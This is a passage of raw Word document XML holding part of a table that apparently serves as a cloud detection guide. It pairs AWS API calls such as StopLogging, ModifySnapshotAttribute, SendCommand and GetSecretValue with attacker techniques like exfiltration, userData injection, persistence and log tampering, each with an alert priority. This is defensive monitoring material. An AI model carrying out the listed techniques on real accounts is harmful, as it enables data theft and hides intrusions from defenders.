          <w:p w14:paraId="704596E5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CreateSnapshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38BAB5C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Potential exfil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DDC13AA"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 (context)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="3AE71825" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="166C751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ec2.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59D5DB29" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ModifySnapshotAttribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C4596D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Snapshot cross-account share</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14B9E73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r>
      <w:tr w:rsidR="00000000" w14:paraId="41DA3A72" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E96190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ec2.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F4A4C32" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ModifyInstanceAttribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="105A1EA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userData injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C56327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5CC63C32" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C010B2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ec2.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F155B36" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CreateLaunchTemplateVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71591FA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Future-launch persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="031F247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465C6332" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C00440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s3.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="713D8BD0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PutBucketPolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6129A644"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Trust change</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15DC7AB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5775E440" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61564F2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s3.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47276AC7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PutBucketReplication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E38257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Persistent exfil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B012F0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r>
      <w:tr w:rsidR="00000000" w14:paraId="1AAE191E" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60C25AB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s3.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B200FA8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PutBucketNotification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3805515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Event-driven persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F0E17A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295E8E4D" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2406574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lambda.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="224E6422" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UpdateFunctionCode20150331v2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3464281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Code replacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01620B77"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r>
      <w:tr w:rsidR="00000000" w14:paraId="64F62A86" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B85F10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lambda.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C7D2CDE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AddPermission20150331v2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="792F182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Cross-principal invoke</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EBD731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5D81C594" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52CA54B5"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events.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37209186" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PutRule</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PutTargets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="777B9F7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Persistence primitive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CA2682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2E370A26" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5685A7D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ssm.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6083C9BA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SendCommand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ADEC561"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Remote code execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F46E7C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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="352A04DE" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="108D1E8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ssm.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10D83EBE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>StartSession</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52EBA68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Interactive access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="355FBED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 (noisy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="398F3E36" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="280997A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rds.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="130BEE29" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ModifyDBSnapshotAttribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BBC647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Snapshot cross-account share</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15675E09"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Very high</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="12223084" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4752674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secretsmanager.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F50B11C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GetSecretValue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15A7605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Secret read</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51284D1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Medium (volume)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="7DA29A1D" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44AC048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kms.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1636A150" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Decrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48D72D9D"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Ciphertext unwrap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01FDB8A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Low (volume)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="59385AE6" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61FF3F8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cloudtrail.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1833F0BD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>StopLogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BA730F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Tamper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="780E574F"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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="29A2CF96" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6204044B"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cloudtrail.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F2589D0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UpdateTrail</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (destination)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E24BEDC"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Tamper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12BAF70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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="487C8AB2" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66026862"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guardduty.amazonaws.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="056B6EF7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
